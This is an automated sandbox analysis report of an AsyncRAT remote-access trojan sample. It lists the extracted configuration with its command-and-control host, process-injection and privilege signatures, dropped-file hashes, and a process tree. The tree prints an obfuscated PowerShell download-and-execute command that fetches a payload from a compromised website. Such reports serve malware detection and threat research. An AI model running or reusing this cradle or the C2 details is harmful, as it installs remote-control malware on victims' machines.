asyncrat | 670281ba138913fc2b66bccfadbe322cb3a6b262c60d4a5dc5b8a74e8e1f9ae2

Analysis

max time kernel
1110s
max time network
1200s
platform
windows10_x64
resource
win10-20220331-en
submitted
11-04-2022 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CMAFVYXWTU.vbs
Size

53KB
MD5

9d4e4d93f96d74a8e14b07aeb01e0fab
SHA1

2e5774aa89bb891842666eae20f9b3e2bd321367
SHA256

670281ba138913fc2b66bccfadbe322cb3a6b262c60d4a5dc5b8a74e8e1f9ae2
SHA512

1952600ad860d0924c3a61ada825d3d3d3c9b2ae685cfd2d0bcbe3c2d35ae43d27e91685e7f1c3c5c8df6a29e00a9a1cc0a826effcfa9af2d471972437d4bb67

Score

10^/10

asyncrat new-opama rat

Malware Config

Extracted

Family

asyncrat

Version

2022 | Edit 3LOSH RAT

Botnet

New-OPAMA

pop11.linkpc.net:6606

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 11 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1684-241-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/1684-240-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/1768-265-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/3972-291-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/2560-313-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/2576-336-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/816-357-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/60-378-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/1684-381-0x0000000006790000-0x00000000067B8000-memory.dmp	asyncrat
behavioral2/memory/756-403-0x000000000040D05E-mapping.dmp	asyncrat
behavioral2/memory/1456-424-0x000000000040D05E-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 2012 powershell.exe

flow	pid	process
2	2012	powershell.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3780 set thread context of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3504 set thread context of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 1836 set thread context of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 688 set thread context of 2560	688	powershell.exe	aspnet_compiler.exe
PID 2188 set thread context of 2576	2188	powershell.exe	aspnet_compiler.exe
PID 2136 set thread context of 816	2136	powershell.exe	aspnet_compiler.exe
PID 1324 set thread context of 60	1324	powershell.exe	aspnet_compiler.exe
PID 3196 set thread context of 756	3196	powershell.exe	aspnet_compiler.exe
PID 2332 set thread context of 1456	2332	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3729659790-1998850411-3319863756-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3729659790-1998850411-3319863756-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
356	powershell.exe
356	powershell.exe
356	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
688	powershell.exe
688	powershell.exe
688	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
1324	powershell.exe
1324	powershell.exe
1324	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
2332	powershell.exe
2332	powershell.exe
2332	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	356	powershell.exe
Token: SeIncreaseQuotaPrivilege	356	powershell.exe
Token: SeSecurityPrivilege	356	powershell.exe
Token: SeTakeOwnershipPrivilege	356	powershell.exe
Token: SeLoadDriverPrivilege	356	powershell.exe
Token: SeSystemProfilePrivilege	356	powershell.exe
Token: SeSystemtimePrivilege	356	powershell.exe
Token: SeProfSingleProcessPrivilege	356	powershell.exe
Token: SeIncBasePriorityPrivilege	356	powershell.exe
Token: SeCreatePagefilePrivilege	356	powershell.exe
Token: SeBackupPrivilege	356	powershell.exe
Token: SeRestorePrivilege	356	powershell.exe
Token: SeShutdownPrivilege	356	powershell.exe
Token: SeDebugPrivilege	356	powershell.exe
Token: SeSystemEnvironmentPrivilege	356	powershell.exe
Token: SeRemoteShutdownPrivilege	356	powershell.exe
Token: SeUndockPrivilege	356	powershell.exe
Token: SeManageVolumePrivilege	356	powershell.exe
Token: 33	356	powershell.exe
Token: 34	356	powershell.exe
Token: 35	356	powershell.exe
Token: 36	356	powershell.exe
Token: SeIncreaseQuotaPrivilege	356	powershell.exe
Token: SeSecurityPrivilege	356	powershell.exe
Token: SeTakeOwnershipPrivilege	356	powershell.exe
Token: SeLoadDriverPrivilege	356	powershell.exe
Token: SeSystemProfilePrivilege	356	powershell.exe
Token: SeSystemtimePrivilege	356	powershell.exe
Token: SeProfSingleProcessPrivilege	356	powershell.exe
Token: SeIncBasePriorityPrivilege	356	powershell.exe
Token: SeCreatePagefilePrivilege	356	powershell.exe
Token: SeBackupPrivilege	356	powershell.exe
Token: SeRestorePrivilege	356	powershell.exe
Token: SeShutdownPrivilege	356	powershell.exe
Token: SeDebugPrivilege	356	powershell.exe
Token: SeSystemEnvironmentPrivilege	356	powershell.exe
Token: SeRemoteShutdownPrivilege	356	powershell.exe
Token: SeUndockPrivilege	356	powershell.exe
Token: SeManageVolumePrivilege	356	powershell.exe
Token: 33	356	powershell.exe
Token: 34	356	powershell.exe
Token: 35	356	powershell.exe
Token: 36	356	powershell.exe
Token: SeIncreaseQuotaPrivilege	356	powershell.exe
Token: SeSecurityPrivilege	356	powershell.exe
Token: SeTakeOwnershipPrivilege	356	powershell.exe
Token: SeLoadDriverPrivilege	356	powershell.exe
Token: SeSystemProfilePrivilege	356	powershell.exe
Token: SeSystemtimePrivilege	356	powershell.exe
Token: SeProfSingleProcessPrivilege	356	powershell.exe
Token: SeIncBasePriorityPrivilege	356	powershell.exe
Token: SeCreatePagefilePrivilege	356	powershell.exe
Token: SeBackupPrivilege	356	powershell.exe
Token: SeRestorePrivilege	356	powershell.exe
Token: SeShutdownPrivilege	356	powershell.exe
Token: SeDebugPrivilege	356	powershell.exe
Token: SeSystemEnvironmentPrivilege	356	powershell.exe
Token: SeRemoteShutdownPrivilege	356	powershell.exe
Token: SeUndockPrivilege	356	powershell.exe
Token: SeManageVolumePrivilege	356	powershell.exe
Token: 33	356	powershell.exe
Token: 34	356	powershell.exe
Token: 35	356	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exeWScript.execmd.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.exe

description	pid	process	target process
PID 2704 wrote to memory of 2012	2704	WScript.exe	powershell.exe
PID 2704 wrote to memory of 2012	2704	WScript.exe	powershell.exe
PID 2012 wrote to memory of 2380	2012	powershell.exe	WScript.exe
PID 2012 wrote to memory of 2380	2012	powershell.exe	WScript.exe
PID 2380 wrote to memory of 2852	2380	WScript.exe	cmd.exe
PID 2380 wrote to memory of 2852	2380	WScript.exe	cmd.exe
PID 2852 wrote to memory of 356	2852	cmd.exe	powershell.exe
PID 2852 wrote to memory of 356	2852	cmd.exe	powershell.exe
PID 3896 wrote to memory of 2400	3896	WScript.exe	cmd.exe
PID 3896 wrote to memory of 2400	3896	WScript.exe	cmd.exe
PID 2400 wrote to memory of 3780	2400	cmd.exe	powershell.exe
PID 2400 wrote to memory of 3780	2400	cmd.exe	powershell.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 3780 wrote to memory of 1684	3780	powershell.exe	aspnet_compiler.exe
PID 4040 wrote to memory of 2388	4040	WScript.exe	cmd.exe
PID 4040 wrote to memory of 2388	4040	WScript.exe	cmd.exe
PID 2388 wrote to memory of 3504	2388	cmd.exe	powershell.exe
PID 2388 wrote to memory of 3504	2388	cmd.exe	powershell.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 3504 wrote to memory of 1768	3504	powershell.exe	aspnet_compiler.exe
PID 892 wrote to memory of 1428	892	WScript.exe	cmd.exe
PID 892 wrote to memory of 1428	892	WScript.exe	cmd.exe
PID 1428 wrote to memory of 1836	1428	cmd.exe	powershell.exe
PID 1428 wrote to memory of 1836	1428	cmd.exe	powershell.exe
PID 1836 wrote to memory of 1376	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 1376	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 1376	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3432	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3432	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3432	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 1836 wrote to memory of 3972	1836	powershell.exe	aspnet_compiler.exe
PID 4032 wrote to memory of 392	4032	WScript.exe	cmd.exe
PID 4032 wrote to memory of 392	4032	WScript.exe	cmd.exe
PID 392 wrote to memory of 688	392	cmd.exe	powershell.exe
PID 392 wrote to memory of 688	392	cmd.exe	powershell.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 688 wrote to memory of 2560	688	powershell.exe	aspnet_compiler.exe
PID 3608 wrote to memory of 3508	3608	WScript.exe	cmd.exe
PID 3608 wrote to memory of 3508	3608	WScript.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CMAFVYXWTU.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Sleep(1);$SwVZ='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://www.pierre.antharesmultimeios.com.br/wp-admin/images/us.png'')'.Replace('t4','adString');Sleep(5);IEX($SwVZ+$t2+$t3)
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\workshop\ISO\xfinity.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\xfinity.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\workshop\ISO\xfinity.ps1'"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:356

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1684

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1768

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1376

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:3432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:3972

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:2560

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2188

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:2192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:2576

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:816

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:60

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:756

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\workshop\ISO\workshop.vbs"
1⤵
PID:3744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\workshop\ISO\workshop.bat" "
2⤵
PID:4016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\workshop\ISO\workshop.ps1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\workshop\ISO\workshop.bat
Filesize
97B

MD5
b8391ea31e00f0d27a9298a1bdc2f935

SHA1
1987754d8feae0ef035a760b8c61e0080243dcbe

SHA256
ad206ea193a9f4f155696be53131e1a3594cf66b0015c5d6e112ace774cb4c25

SHA512
0d68e0ef21f2695cc0b8d07427b8ba58dccafad8e1fa28dfd037a8cdd6f01148538d7d173fa27395be6f92cd8e4e7cfce3fb1f40e454b6f3b18bf01067186a8a

Download Submit
C:\ProgramData\workshop\ISO\workshop.ps1
Filesize
659KB

MD5
28d999039fd141726a6ebd3908b8ff8f

SHA1
6d9211a5e9f6d9d17b9964e1a054838e99b4745b

SHA256
0bedd5aaa86ccdb0c3de21fc389e1bc373e1b10cdcf9e94583c37e0e2564b0fd

SHA512
e21212d247fbfe30c8300264972f99d23c7a38d86296895b816bc2f02fa8bd32d118214918ac9b45d3ae842b4f13d0f37492ddecf5d38de525e201a249860604

Download Submit
C:\ProgramData\workshop\ISO\workshop.vbs
Filesize
2KB

MD5
0c7bdbf37396cef94b7cbb7de15a1698

SHA1
264fa83be5772c47f97f8720dc099dd0452bf13c

SHA256
14d35ceca25dc97bc2501df064c99736fa8230aab531bafbef40c53b2f9bcc4f

SHA512
0694a55b6935fcc8d9645f82abe1207278445d7c0a30d80a275340ca354947af793c4800371da47ff4141be861a85c7c8d46d88794e3cbfc120711e3563542db

Download Submit
C:\ProgramData\workshop\ISO\xfinity.bat
Filesize
102B

MD5
73697f63bf707cad9d6e40d11e193bc4

SHA1
d4a627e75d4e3f3c6782433288c268690b22b659

SHA256
810a283ca847547f075cd0e6893d2651fe2a375920d306151f0b8c73a7f2c349

SHA512
ccb973eaffdd8004be6e781460103feb60f5fbcf354fdea1c61f3aa08974b7ced1b2042176980ae59f772c658f5e4cdc6ccdd9371278f402d8b4ec093867bf18

Download Submit
C:\ProgramData\workshop\ISO\xfinity.ps1
Filesize
478B

MD5
c76a6e611a044a2af0669f543b012001

SHA1
65707d159d939abe8decfb7e40442e0b494dda6e

SHA256
1d0ab56bb9c0dbc0a6a36198b482e57982f13b9c6123e5e54dd5cd7af26aa060

SHA512
19a67d056e170fb855e7e86869a04a196e6f50ed5aa91f6b2afa5855037551b1b88391751f3876dba4f2f9d9002ffa45dbfa6316fd92b0e64837ebf1ba0faa1b

Download Submit
C:\ProgramData\workshop\ISO\xfinity.vbs
Filesize
2KB

MD5
c6e17f4768aa92da03fca294e17937df

SHA1
55e9b21923f2c761af403cc0b7d0d872fb9bbaed

SHA256
b9059c075420b4b5decf6c10599c30a0bd405c5fe634495df0a111195981bad8

SHA512
822d54a59502ff5d4b7bd0ec1d01f1d514a4a02ee91cac20a95420b03dba8dade9fe16747eb3f61067e20b8d808bf9c3cc4fc1ed009017dac936a331da249db5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cf2e4c219c954eb7e4c407ca5faeac5f

SHA1
a3a2b60e04c3f4a8fd6b35f0e2ea19a741bd6c41

SHA256
6c517480a44be0d595cb5bc021c5a5055e86a0cdd2666f4e3ca36337e75b483f

SHA512
5d27115f3477e9c8d59669e117222253cdffdf88457e5ecea2efba1ae6408a9c174e8cee62701e3a2c95a57b3791ae0186ea37bcbd6048da0070a2cc8f1c4081

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3f03586069a123b5f7c4d8f639b0cddc

SHA1
a588e68f1f4b077c3394d0700337a0dbf237ea6a

SHA256
642ca3a422739dd31451a09201d8be5198fcce201eb2f8be6a9e1606c2c31961

SHA512
cb34614ba872554b088f21e1661354a0549559e1fff85cda3dd191fa6f1c971734acb0fecdd26c76d319675d6a8e8adfe5feda66d4883c16c8c185a2b0a79f18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
473198d63094e5d051f247688c74bc90

SHA1
d2f40121b29663d3d7ac0dcd8be748d4764aa59a

SHA256
c1ef47ce93c26ba0a53de85ff041174fbf1c8e55be73b0ad6e7e3a9a665a8e08

SHA512
1e41c7d6028b871d63a4db51a7425157e61910f0381f70f1afbbaeebc421be0fe09fd7144441b8208ddb945b57734cf4d88c21efcda7fc2793594c9f030c6d01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4e81b0b0054e6c457d98b48d7b0b1239

SHA1
b6b957e8dc54692f7ba26e9e3fdfc772c407cc02

SHA256
7dc2f273837aefee40cbbb0b03da60b54ae437e64ee394feb2693f59a6451f0f

SHA512
fbe9616476680a2779c7941bb71b45314bf7622b0a6e8d200e45a879deeb3687f28ab9a135ecdd232a6ae8d0177e5449da0a5bf0b223ecfcc2284f8200c3f173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3a54d673ffc155a03522202199e165e3

SHA1
b962a39f387c9ac66500269c4f933d9d2e457c09

SHA256
9a0812111098d8351e18440d7fa3beb237cea99928d79d2a60ca548244b2e1dd

SHA512
e301a1b151423b62ea13c8565a6bed75218471eeea8bf069bb10b3a92fc51d942456595795251c33de40b80e67f3b88774ad7cd8217819da54b1943be32f3e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
48af4160dee797582167c7e639252fc9

SHA1
6238d0c4f65e2ed4ee877ce49527f241ef5d4419

SHA256
da50d863affe324b526adba440ff6587da0d9995caaa4ea9338e042f14e4116a

SHA512
b3b273b4983cd8a54b771e3acf73ea1b5d8ac0945b8c878147e9fe77a7606301f4c814ba7cf07fdac897f7baf588692c7ac8261aac94698179f2e794a3fd1c8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4e81b0b0054e6c457d98b48d7b0b1239

SHA1
b6b957e8dc54692f7ba26e9e3fdfc772c407cc02

SHA256
7dc2f273837aefee40cbbb0b03da60b54ae437e64ee394feb2693f59a6451f0f

SHA512
fbe9616476680a2779c7941bb71b45314bf7622b0a6e8d200e45a879deeb3687f28ab9a135ecdd232a6ae8d0177e5449da0a5bf0b223ecfcc2284f8200c3f173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
02061ab08aa41965b8aac3f63aff1714

SHA1
6588254fce246eb710b30f474a90198dc33f62af

SHA256
e45bd34ac2acb71afa33343737680c7483c827e6b8c0eabad3ce7328fae82a54

SHA512
67312ac9f7062e2951ff04866ffe893fde1db792fc09875d6111d6c1e64208bf1411a8895f0edaa0f5a7dfdfd4412396b344cdb98335abb5feb5bfae0b77e150

Download Submit
